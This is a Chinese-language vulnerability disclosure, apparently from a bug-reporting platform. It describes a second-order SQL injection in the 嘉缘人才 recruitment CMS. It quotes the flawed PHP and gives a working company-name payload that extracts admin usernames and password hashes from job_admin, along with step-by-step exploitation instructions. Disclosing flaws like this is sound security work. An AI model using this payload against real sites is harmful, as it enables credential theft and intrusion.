嘉缘人才系统sql注入可出任意数据

### 简要描述： 求20rank ### 详细说明： 看到frcms\member\person_favoriteadd.php ``` defined('IN_FR') or exit('Access Denied'); if($user_type!='pmember'){ echo "<script>alert('您好，您不是个人会员不能操作此功能！');location.href='javascript:history.back()';</script>"; exit; } if($Glimit[1]=='-1'){ echo "<script language=javascript>alert('您所在的会员组不能收藏职位，请联系网站客服进行升级！');location.href='javascript:history.back()';</script>";exit(); } $checks = preg_replace("/[^0-9,\.-]/i",'',$checks); if($do=='favorite'){ $checksnum=count(explode(',',$checks)); if($Glimit[1]!=0&&$uinfo['limit'][4]<$checksnum){showmsg("您的职位收藏可用数量不足，请返回重新选择！","-1",0,2000);exit();} $checks=explode(',',$checks); foreach($checks as $k){ $rs=$db ->get_one("select f_id from {$cfg['tb_pre']}myfavorite where f_pmember='$username' and f_hid=$k limit 0,1"); if(!$rs){ //记录并扣除发送数 $uplimit[4]=$Glimit[1]?-1:0;$uplimit[3]=1; uplimit($Memberid,$uinfo['limit'],$uplimit); $rss=$db->get_one("select h_id,h_comname,h_place,h_member from {$cfg['tb_pre']}hire where h_id=$k order by h_adddate desc limit 0,1"); //出库 if($rss){ $hireid=$rss['h_id'];$comname=$rss['h_comname'];$place=$rss['h_place'];$cmember=$rss['h_member']; $db ->query("INSERT INTO {$cfg['tb_pre']}myfavorite (f_hid,f_comname,f_place,f_adddate,f_pmember,f_cmember) VALUES('$hireid','$comname','$place',NOW(),'$username','$cmember')"); //入库 var_dump($db); $integral=$Gintegral[0]; require_once(FR_ROOT.'/inc/paylog.inc.php'); $integral&&upintegral($Memberid,"收藏职位【{$place}】获得积分+$integral",$integral); adddynamic($Memberid,$uinfo['m_name'],1,9,$hireid,$place,6); } } } showmsg('恭喜您收藏成功！',"?m=person_favorite&show=works",0,2000);exit(); ``` 通过以上代码可以看到h_comname出库之后，就直接再次入库。中间没有转义，很明显这是一处二次注入。 首先注册一个名为test的个人用户 [<img src="https://images.seebug.org/upload/201503/031715534bfd0f07d7b1cae7a3366540c31488e2.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031715534bfd0f07d7b1cae7a3366540c31488e2.png) 然后在注册一个名为fuck的企业用户，其中公司名称为 ``` ' or char(@`'`),(select(group_concat(a_user,0x7c,a_pass))from job_admin),'1','test','fuck')# ``` [<img src="https://images.seebug.org/upload/201503/03171627457fce08f669ac1728cdb905ab0627f9.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/03171627457fce08f669ac1728cdb905ab0627f9.png) 注册成功之后，然后发布随便一个职位 [<img src="https://images.seebug.org/upload/201503/031717548702e1e2e01998b4df74d432571c0484.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031717548702e1e2e01998b4df74d432571c0484.png) [<img src="https://images.seebug.org/upload/201503/03171843247233a12c54083cefb764b6a4628d51.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/03171843247233a12c54083cefb764b6a4628d51.png) 登陆test这个会员用户收藏这个职位 http://127.0.0.1/frcms/member/index.php?m=person_favoriteadd&do=favorite&checks=1 可以看到mysql日志文件 [<img src="https://images.seebug.org/upload/201503/031719144f88dc2dde0c13c34f7e8f322e568005.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031719144f88dc2dde0c13c34f7e8f322e568005.png) 然后直接可以看到数据 [<img src="https://images.seebug.org/upload/201503/0317193531af2e9cc7fba9d927bc224a18ad3030.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/0317193531af2e9cc7fba9d927bc224a18ad3030.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201503/0317193531af2e9cc7fba9d927bc224a18ad3030.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/0317193531af2e9cc7fba9d927bc224a18ad3030.png)